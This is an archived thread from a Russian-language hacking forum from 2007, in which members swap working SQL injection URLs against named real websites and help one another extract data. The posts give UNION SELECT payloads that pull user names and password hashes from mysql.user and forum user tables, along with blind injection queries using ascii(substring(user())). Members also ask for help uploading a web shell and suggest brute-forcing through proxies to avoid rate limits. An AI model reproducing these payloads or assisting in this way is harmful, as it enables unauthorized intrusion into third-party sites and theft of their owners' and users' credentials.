HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #171  
Старый 19.09.2007, 11:56
1d37r
Banned
Регистрация: 24.08.2007
Сообщений: 50
Провел на форуме:
303789

Репутация: 16
По умолчанию

если честно я не знаю просто знакомый попросил посмотреть я посмотрел нихера не понял... вот решил у вас поинтересоваться)))) вообщем так на первый взгляд ничего опасного нет??
 
Ответить с цитированием

  #172  
Старый 19.09.2007, 13:55
MegaBits
Участник форума
Регистрация: 30.08.2006
Сообщений: 181
Провел на форуме:
1058786

Репутация: 45
По умолчанию

Помогите залить шелл если это возможно.
Вот нашел давно такие скуль иньекции
Цитата:
http://www.berdyansk.net/pointer/links.php?part_id=-18+union+select+1,2,3,user,password,6+from+mysql.u ser/*
Цитата:
http://www.azovsintez.com/user/links.php?cond=-2+union+select+1,2,3,4,5/*
Сайты расположены на одном хостинге пароль к ftp расшифровать несмог. К некоторым владельцам сайтов есть пароль, но к незнаю где его вводить??? Еще там есть форум, может кто-то сможет доработать скуль чтоб вытащить хеш админа форума.
 
Ответить с цитированием

  #173  
Старый 19.09.2007, 14:42
Heavy Metal
Новичок
Регистрация: 16.09.2007
Сообщений: 25
Провел на форуме:
120760

Репутация: 62
Отправить сообщение для Heavy Metal с помощью ICQ
По умолчанию

MegaBits, форумные
Код:
http://www.berdyansk.net/pointer/links.php?part_id=-18+union+select+1,2,3,pass,login,6+from+forum.users/*
 
Ответить с цитированием

  #174  
Старый 20.09.2007, 06:12
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

Проблема решена, с помощью наставления на путь истинный более опытными sql-injecter'ами.
Всем, принявшим участие, выражаю огромную благодарность!
 
Ответить с цитированием

  #175  
Старый 20.09.2007, 18:37
Kaimi
Reservists Of Antichat - Level 6
Регистрация: 23.08.2007
Сообщений: 1,237
Провел на форуме:
18127311

Репутация: 1676


Отправить сообщение для Kaimi с помощью ICQ
По умолчанию

Помогите раскрутить скулю itsoft.ru/search/?search_query=1&in_cat=1'
 
Ответить с цитированием

  #176  
Старый 20.09.2007, 18:58
phol1eadeux
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900

Репутация: 138
По умолчанию

Цитата:
Сообщение от Kaimi  
Помогите раскрутить скулю itsoft.ru/search/?search_query=1&in_cat=1'
Пользователь урезан в правах. Делать нечего
 
Ответить с цитированием

  #177  
Старый 20.09.2007, 19:26
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

http://itsoft.ru/search/?search_query=1&in_cat=hek%'+union+select +version()/*
version() = 4.1.14
user() = itcms_test@localhost
database() = itcms_test

http://itcms3.itsoft.ru/itcms/
^^
__________________

Последний раз редактировалось +toxa+; 20.09.2007 в 19:48..
 
Ответить с цитированием

  #178  
Старый 26.09.2007, 19:49
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462

Репутация: 91
Отправить сообщение для SUBJECT617 с помощью ICQ
По умолчанию

http://www.stalker-portal.ru/polls.php?id=1'
(Моя первая найденная скуля... Сразу говорю, вопросу ламерские, но для того и эта тема)

НУ так вот, число столбцов 6..

Однако по Полному ФАКу в разделе статьи в пункте "2.1.2 Определение выводимых столбцов" у меня стопор... Никакие "циферки" не высвечиваются

http://www.stalker-portal.ru/polls.php?id=1' UNION SELECT 1,2,3,4,5,6 --/* -Вот собственно и оно

В общем наставьте меня на путь истинный... Хочется узнать, можно отсюда что выжать или нет(

Последний раз редактировалось SUBJECT617; 26.09.2007 в 20:23..
 
Ответить с цитированием

  #179  
Старый 27.09.2007, 14:07
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

http://www.stalker-portal.ru/polls.php?id=1'%20or%20ascii(substring(user(),1,1) )>0/*
http://www.stalker-portal.ru/polls.php?id=1'%20or%20ascii(substring(user(),1,1) )<0/*

только там некая защита.. врубается на кол-во запросов в минуту, поэтому через проксики надо брутить все ))
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #180  
Старый 27.09.2007, 15:20
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462

Репутация: 91
Отправить сообщение для SUBJECT617 с помощью ICQ
По умолчанию

Хмм, а эта защита случаем не на 200 секунд блочит? Я пытался просканить но меня забанили изза 'Hammering' на 200 секунд.
Такс, а где можно почитать про or ascii...? В факе этого нет...

Спс буду брутить) А как перейти на второй символ?

sm.. С символами разобрался, покачто не забанили... А ты сколько брутил то?) Как определить сколько символов? Точнее когда закончатся символы?

А как ты сделал так что он тебе показывает голосование при 1? ТАм на 1 и на 0 ничего нет в id


И еще... Пасс сгенеренный сто пороцентов... Как же я с регистром разберусь??

Последний раз редактировалось SUBJECT617; 27.09.2007 в 16:02.. Причина: Уж это лучше сотру)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ